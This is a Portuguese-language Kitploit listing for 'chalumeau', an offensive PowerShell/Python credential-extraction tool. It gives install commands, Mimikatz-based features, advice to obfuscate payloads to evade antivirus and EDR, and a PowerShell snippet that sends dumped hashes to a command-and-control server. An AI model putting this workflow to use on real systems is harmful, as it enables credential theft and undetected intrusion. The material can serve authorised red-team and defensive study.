Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
chalumeau — Chalumeau é uma ferramenta automatizada,extensível e personalizável de extração de credenciais baseada em powershell e python. | Kitploit
Ferramentas/GitHubGitHub/cyberstruggle/chalumeau
Ataques de SenhaPós-ExploraçãoTestes de PenetraçãoComando e ControleRed TeamingDesenvolvimento de Payloads
GitHubcyberstruggle/chalumeau

chalumeau

Chalumeau é uma ferramenta automatizada,extensível e personalizável de extração de credenciais baseada em powershell e python.

Ver Repositório
10219há 6 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar


Chalumeau

Chalumeau é uma ferramenta automatizada, extensível e personalizável de extração de credenciais baseada em powershell e python.

Principais Características

  • Escreva seus próprios Payloads
  • Execução em memória
  • Extrair lista de senhas
  • Relatórios do painel / Interface web
  • Análise do Mimikatz
  • Extração de Tickets

Capturas de Tela


Problemas Conhecidos

  • Análise do dcsync do Mimikatz (trabalhando na correção)
  • Para contornar antivírus e EDRs , você precisará manter seus payloads

TODO

  • Comunicação criptografada
  • Movimento lateral automatizado
  • Spray de senhas automatizado
  • Quebra de hashes automatizada

Utilização

root@kitploit:~
git clone https://github.com/cyberstruggle/chalumeau.git
cd chalumeau/
chmod +x install.sh
sudo ./install.sh

# Run
chmod +x start.sh

sudo ./start.sh

Escreva seu próprio payload

ofusque seu próprio payload do powershell para extrair credenciais e use a chamada de função do chalumeau sem nenhuma importação o chalumeau criptografará e entrará em contato com o C2 e enviará as credenciais extraídas. basta salvar o arquivo em chalumeau-power/payloads

  • Usando a Função ChalumeauSendCredentials
    • ChalumeauSendCredentials
      • Secret = o hash extraído ou senha em texto claro (string)
      • Username = o nome de usuário ou ID da credencial extraída (string)
      • IsClearText = 1 se for texto claro, 0 caso contrário (int)
      • Source = mencione o payload de origem, como "Mimikatz Hash" (string)
root@kitploit:~
# Custom Payload Example
# $DumpedHashes is array of dumped hashes from the local machine
foreach ($hash in $DumpedHashes){
    ChalumeauSendCredentials -Secret $hash.secret -Username $hash.user -IsClearText 0 -source "My custom payload"
} 

Créditos

  • wazehell Autor
  • Invoke-Obfuscation Daniel Bohannon
  • Invoke-Mimikatz PowerSploit
  • Get-PassHashes nishang
  • Logotipo do Chalumeau Aureliano
  • Invoke-MassMimikatz PowerTools
Baixar ferramenta